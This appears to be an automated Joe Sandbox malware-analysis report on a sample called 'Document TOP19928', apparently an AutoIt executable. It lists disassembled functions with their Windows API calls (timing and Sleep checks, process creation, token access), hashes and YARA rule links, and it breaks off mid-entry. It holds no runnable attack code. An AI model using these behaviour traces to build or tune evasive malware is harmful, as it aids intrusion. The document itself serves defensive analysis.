Opcode ID: df0941e01ad0361ae938d1db09c215ae10c381d374fe931ef92c0d9cf26d8bbb
Instruction ID: 2ad85724cf70eb82c1cc5740b47bcb6a7a52f0363dd91e035068d13e5d9f01b5
Opcode Fuzzy Hash: df0941e01ad0361ae938d1db09c215ae10c381d374fe931ef92c0d9cf26d8bbb
Instruction Fuzzy Hash: CE115E79900218FFEB10DFA5CC84E9DBBB4FB48710F2040A5EA04B7250D6716E50DB90

Function 00831652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008301FD,?,00831250,?,00008000), ref: 0083166F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,008301FD,?,00831250,?,00008000), ref: 00831694
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008301FD,?,00831250,?,00008000), ref: 0083169E
Sleep.KERNEL32(?,?,?,?,?,?,?,008301FD,?,00831250,?,00008000), ref: 008316D1

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: b9494b0ed5e6060b93662322a2f2904f31ea41403cd5395de930bd1ea00a9899
Instruction ID: 883f91dcd1cf59011593723a99c7579c810005ac55a4fd8bdef0727301a518d4
Opcode Fuzzy Hash: b9494b0ed5e6060b93662322a2f2904f31ea41403cd5395de930bd1ea00a9899
Instruction Fuzzy Hash: 39118E31C05A2DDBCF00AFE5D84AAEEBB78FF59B02F044055EA41F2241EB7455608BD6

Function 00807207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0080722B

Part of subcall function 00807912: __fltout2.LIBCMT ref: 0080793B

__cftog_l.LIBCMT ref: 00807251
__cftoe_l.LIBCMT ref: 00807283

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 6a7f19417216fe675c64b92b5bfb1a42acdd7a7d300e05704aa4b09ee7306f98
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 8C01803284418EBBCF925F88CC018EE3F22FF19344B488515FA1998071C237E9B1AB82

Function 0085B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0085B59E
ScreenToClient.USER32(?,?), ref: 0085B5B6
ScreenToClient.USER32(?,?), ref: 0085B5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0085B5F5

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: eb4b4b0f2b52a6ae15bda28e64326fc87fc938a00c2e2f303e11f472f8fa3980
Instruction ID: ff6788d47a4e9561a60a9edeadd905bb175d7f3c22a8826c03aa14532a9ef88d
Opcode Fuzzy Hash: eb4b4b0f2b52a6ae15bda28e64326fc87fc938a00c2e2f303e11f472f8fa3980
Instruction Fuzzy Hash: 9B1143B9D00209EFDB41CFA9C8849EEFBF9FB18311F108166E914E3220D735AA558F90

Function 0085B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0085B8FE
_memset.LIBCMT ref: 0085B90D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00897F20,00897F64), ref: 0085B93C
CloseHandle.KERNEL32 ref: 0085B94E

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 0179a70cbc7e0dce5bff1f5e4a15486b5ea9a79f9372d5071f91ddc7aa04bcb6
Instruction ID: 4f5add5561a8156a25d0e3bca026995a1f2b7f17bd808e641a4842ecf805baee
Opcode Fuzzy Hash: 0179a70cbc7e0dce5bff1f5e4a15486b5ea9a79f9372d5071f91ddc7aa04bcb6
Instruction Fuzzy Hash: 7AF05EB2554304BBF6103761AC09FBB3A5CFB09355F040022BB08E52A2DB75890087A8

Function 00836E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 00836E88

Part of subcall function 0083794E: _memset.LIBCMT ref: 00837983

_memmove.LIBCMT ref: 00836EAB
_memset.LIBCMT ref: 00836EB8
RtlLeaveCriticalSection.NTDLL(?), ref: 00836EC8

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 72a3061a39d061d2dbfc26e7a74acd65cc7ce5f30078e4904e36aed9ba97e11b
Instruction ID: 53156884daaeff020394bc22a4046d4d6dbc5a91e5bbecb811a25ab7929c30f9
Opcode Fuzzy Hash: 72a3061a39d061d2dbfc26e7a74acd65cc7ce5f30078e4904e36aed9ba97e11b
Instruction Fuzzy Hash: 1FF0307A100204ABCF016F55DC85A5ABB2AFF45321F448061FE089E217CB35E911CBB5

Function 0085C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 007D12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007D134D
Part of subcall function 007D12F3: SelectObject.GDI32(?,00000000), ref: 007D135C
Part of subcall function 007D12F3: BeginPath.GDI32(?), ref: 007D1373
Part of subcall function 007D12F3: SelectObject.GDI32(?,00000000), ref: 007D139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0085C030
LineTo.GDI32(00000000,?,?), ref: 0085C03D
EndPath.GDI32(00000000), ref: 0085C04D
StrokePath.GDI32(00000000), ref: 0085C05B

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 7a8c7184a1ff742b54d0ffb5f6779d9191b1a3a4e18a71b90f4b78470dcc97e8
Instruction ID: 567a95d1965d0136846a86a30cd92c967e01b6969e6168222bd9b708962ffe74
Opcode Fuzzy Hash: 7a8c7184a1ff742b54d0ffb5f6779d9191b1a3a4e18a71b90f4b78470dcc97e8
Instruction Fuzzy Hash: 37F03A31001B59BBDB126F55AC0DFCA3F99BF05312F084051FB11610E2876A5665CF95

Function 0082A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0082A399
GetWindowThreadProcessId.USER32(?,00000000), ref: 0082A3AC
GetCurrentThreadId.KERNEL32 ref: 0082A3B3
AttachThreadInput.USER32(00000000), ref: 0082A3BA

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: b4b9a3bb4cfb628141daff1f1ce729ed645ff74ef9bf478ac98671b6c9c2dee4
Instruction ID: 4e967119aacd6b74163cd894ade8b67aa4bf8f7dc9b334615faebb55aea76eb8
Opcode Fuzzy Hash: b4b9a3bb4cfb628141daff1f1ce729ed645ff74ef9bf478ac98671b6c9c2dee4
Instruction Fuzzy Hash: 25E0C971545338BBDB215BA2EC0DED77F5CFF267A2F408025FA09D5062C6758580DBA1

Function 007D2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 007D2231
SetTextColor.GDI32(?,000000FF), ref: 007D223B
SetBkMode.GDI32(?,00000001), ref: 007D2250
GetStockObject.GDI32(00000005), ref: 007D2258
GetWindowDC.USER32(?,00000000), ref: 0080C0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 0080C0E0
GetPixel.GDI32(00000000,?,00000000), ref: 0080C0F9
GetPixel.GDI32(00000000,00000000,?), ref: 0080C112
GetPixel.GDI32(00000000,?,?), ref: 0080C132
ReleaseDC.USER32(?,00000000), ref: 0080C13D

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 8c858fae1133a18c4fb5ff7d49536ed9962bdaefeb10bb66ad3245c41e160588
Instruction ID: 2bfbb19f89bb3bfb2f504b4efeb0d53bb7814b430a9a658eb94701b3800d33db
Opcode Fuzzy Hash: 8c858fae1133a18c4fb5ff7d49536ed9962bdaefeb10bb66ad3245c41e160588
Instruction Fuzzy Hash: 2CE03932140644EADF625F64EC09BD87B20FB15332F008366FBA9880E287754981DB11

Function 00828C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00828C63
OpenThreadToken.ADVAPI32(00000000,?,?,?,0082882E), ref: 00828C6A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0082882E), ref: 00828C77
OpenProcessToken.ADVAPI32(00000000,?,?,?,0082882E), ref: 00828C7E

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 9617ef5b64237c52d7398ad8bd2470ea1e636876365e938cc2d4abfbe39d009e
Instruction ID: 04494145f203ceb9bc9777419e447c6adeaa22aed1e0eeabe68ddb5148ea6f85
Opcode Fuzzy Hash: 9617ef5b64237c52d7398ad8bd2470ea1e636876365e938cc2d4abfbe39d009e
Instruction Fuzzy Hash: ACE04F76642321DBDB605FB16D0CB973BA8FF50793F084828A345CA081DB3884818B61

Function 00812187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00812187
GetDC.USER32(00000000), ref: 00812191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 008121B1
ReleaseDC.USER32(?), ref: 008121D2

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 923e61b85044843278f19de4373d7ebc549f62c16b97bdbb57f3ad8a790cc0b3
Instruction ID: 93037e8ff957a4cbd0dffa6fcfeea83741a35f8f6a6ed974ace0c40c823af718
Opcode Fuzzy Hash: 923e61b85044843278f19de4373d7ebc549f62c16b97bdbb57f3ad8a790cc0b3
Instruction Fuzzy Hash: 6FE0C275800614EFDB019F60C808A9D7BF5FB58352F108426EA5AA6261DB3891419F40

Function 0081219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0081219B
GetDC.USER32(00000000), ref: 008121A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 008121B1
ReleaseDC.USER32(?), ref: 008121D2

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 9a61a617a88eaad4ad60ae71b11762f39f77065ca280985bb0decddbb5312aa1
Instruction ID: 4f99f51eee6d29c698bdec28b1d2fca9b97e654aef7865967084f8690c5ea211
Opcode Fuzzy Hash: 9a61a617a88eaad4ad60ae71b11762f39f77065ca280985bb0decddbb5312aa1
Instruction Fuzzy Hash: 91E0EEB5800204AFCF019FA0C80869E7BF1BB6C322F10802AFA5AA7262DB3C9141DF40

Function 00849A72 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00827652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0082758C,80070057,?,?), ref: 00827698

_memset.LIBCMT ref: 00849B28
_memset.LIBCMT ref: 00849C6B

Strings

NULL Pointer assignment, xrefs: 00849CF0

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _memset$lstrcmpi
String ID: NULL Pointer assignment
API String ID: 1020867613-2785691316
Opcode ID: 21ca4f49c45f5a435a256c1e99870ccd973e18d4b86a431d43616c9eb5c83217
Instruction ID: 9b9edd5e3f5a3452808b7ae726b2ccd76a8af5d5867566a559395fc66aef07e0
Opcode Fuzzy Hash: 21ca4f49c45f5a435a256c1e99870ccd973e18d4b86a431d43616c9eb5c83217
Instruction Fuzzy Hash: FD911871D0022DEBDB20DFA5DC85ADEBBB9FF08710F20415AE519A7241EB755A44CFA0

Function 0082B7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0082B981

Strings

AutoIt3GUI, xrefs: 0082B8F9
Container, xrefs: 0082B8FE

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: a4838e6b70406f8731edd7d1c9d83a2e206c9d3f459a1eb2e75c640df2a38fd2
Instruction ID: 571d3852896c3248e721632c77dd9c308d1956105b7edd7dbc1d4cf3e11dd497
Opcode Fuzzy Hash: a4838e6b70406f8731edd7d1c9d83a2e206c9d3f459a1eb2e75c640df2a38fd2
Instruction Fuzzy Hash: A3915C706016159FDB24DF68D884A6ABBF8FF48710F14856EF94ACB791EB70E880CB50

Function 0083B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 007EFEC6: _wcscpy.LIBCMT ref: 007EFEE9

Part of subcall function 007D9997: __itow.LIBCMT ref: 007D99C2
Part of subcall function 007D9997: __swprintf.LIBCMT ref: 007D9A0C

__wcsnicmp.LIBCMT ref: 0083B298
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0083B361

Strings

LPT, xrefs: 0083B292

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: c1f4bf5cd17a3268839763a4b5269e59ca132f7a5c0ae24c2ae17bc8ce82c213
Instruction ID: 95ed060c6f2d81c34af2769b6d34493bc924da632b5a2ddac1c048ac55246f32
Opcode Fuzzy Hash: c1f4bf5cd17a3268839763a4b5269e59ca132f7a5c0ae24c2ae17bc8ce82c213
Instruction Fuzzy Hash: 04613EB5A00219EFCB14DB94C895EAEB7F4FB48310F11415AFA46EB391DB74AE40CB90

Function 00818A77 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00818B1E
_memmove.LIBCMT ref: 00818B78

Strings

Oa~, xrefs: 00818BF2, 0081E39A, 0081E3B6

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _memmove
String ID: Oa~
API String ID: 4104443479-1339823410
Opcode ID: f026f5bb92be255d78c7c9dc1a3a8278eed627b05b6396ee54df8797c35c650c
Instruction ID: 55fba1bea51b29be40f00524af7c6053b9b5d646cd601bafcfc53218ee70cfdf
Opcode Fuzzy Hash: f026f5bb92be255d78c7c9dc1a3a8278eed627b05b6396ee54df8797c35c650c
Instruction Fuzzy Hash: 7B518EB0A00609DFCB24CF68C885AEEBBF5FF44314F14452AE85AD7240EB31A995CB51

Function 007E2AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 007E2AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 007E2AE1

Strings

@, xrefs: 007E2AD5

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
